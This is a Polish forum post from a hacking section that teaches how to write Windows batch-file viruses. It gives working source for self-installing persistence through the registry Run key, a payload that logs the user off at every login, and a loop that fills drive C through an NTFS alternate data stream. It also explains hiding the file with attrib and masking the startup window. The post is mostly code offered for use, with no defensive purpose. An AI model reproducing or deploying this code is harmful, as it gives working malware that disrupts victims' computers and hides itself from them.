Wirusy plików bat

- Windows XP I Wszystko od A do Z I Triki komputerowe I i inne I
   http://www.wxp.pun.pl/index.php
- Hakering
   http://www.wxp.pun.pl/viewforum.php?id=15
- Wirusy plików bat
   http://www.wxp.pun.pl/viewtopic.php?id=580

RedEagle - 2008-10-31 19:47:59

Wirusy plików bat

1. Wstępniak

Określenia
bat - plik wsadowy
run - klucz rejestru (-> punkt 2)

2. Autostart wirusa

Omówie tu tylko jeden ze sposobów, mianowicie rejestr.
Są dwa klucze, z którymi startują programy po zalogowaniu:

- [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

3. Jak sam bat może dodawać sie do rejestru???

Oto źródło:

--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo "wirek"="hideex.exe plik.bat">>reg.reg
regedit /s reg.reg
del reg.reg
--------------------------------------

Omówienie:
- tworzy plik reg.reg
- dodaje go do rejestry
- usuwa plik reg.reg

4. Co może nasz wirus???

Bawiąc sie batami zrobiłem 2 wirki:

1. po zalogowaniu wylogowywuje usera

--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo ""="logoff.exe">>reg.reg
regedit /s reg.reg
del reg.reg
--------------------------------------

Omówienie:
- dodaje do run plik logoff.exe

2. zapełnia dysk c:

--------------------------------------
@echo off
echo REGEDIT4>>reg.reg
echo. >>reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg.reg
echo ""="%0">>reg.reg
regedit /s reg.reg
del reg.reg
cd c:
:go
type boot.ini>> boot.ini:str1
goto :go
--------------------------------------

Omówienie:
- dodaje sie do rejestru
- zapisuje plik boot.ini do strumienia, czyli partyca musi być w NTFSie:(
ale zamiast "type boot.ini>> boot.ini:str1" możemy "type boot.ini>> wirek.cus"

5. Ukrywanie bata

Ukrycie pliku na dysku

--------------------------------------
attrib +H +S %0
--------------------------------------

"Ukryty" start programu

Dodając wpis do rejestru musimy pamiętać, że jak wida zrestartujemy to po zalogowaniu
mignie okienko. Lepiej będzie jak damy jeszcze taki programek jak hideex.
Wtedy wpis w rejestrze (wyeksportowany) będzie wyglądał tak:

"wirek"="hideex.exe plik.bat"

przy założeniu, że bedą uruchamiane z c:\windows\system32.
Ja wole zamiast "wirek" zostawić "" bo wtedy w rejestrze bedzie to
zapisane jako "(Domyślna)".

6. Podsumowanie

Batwirusy mają duże możliwości i działanie wirusa zależy tylko i wyłącznie od zamiarów autora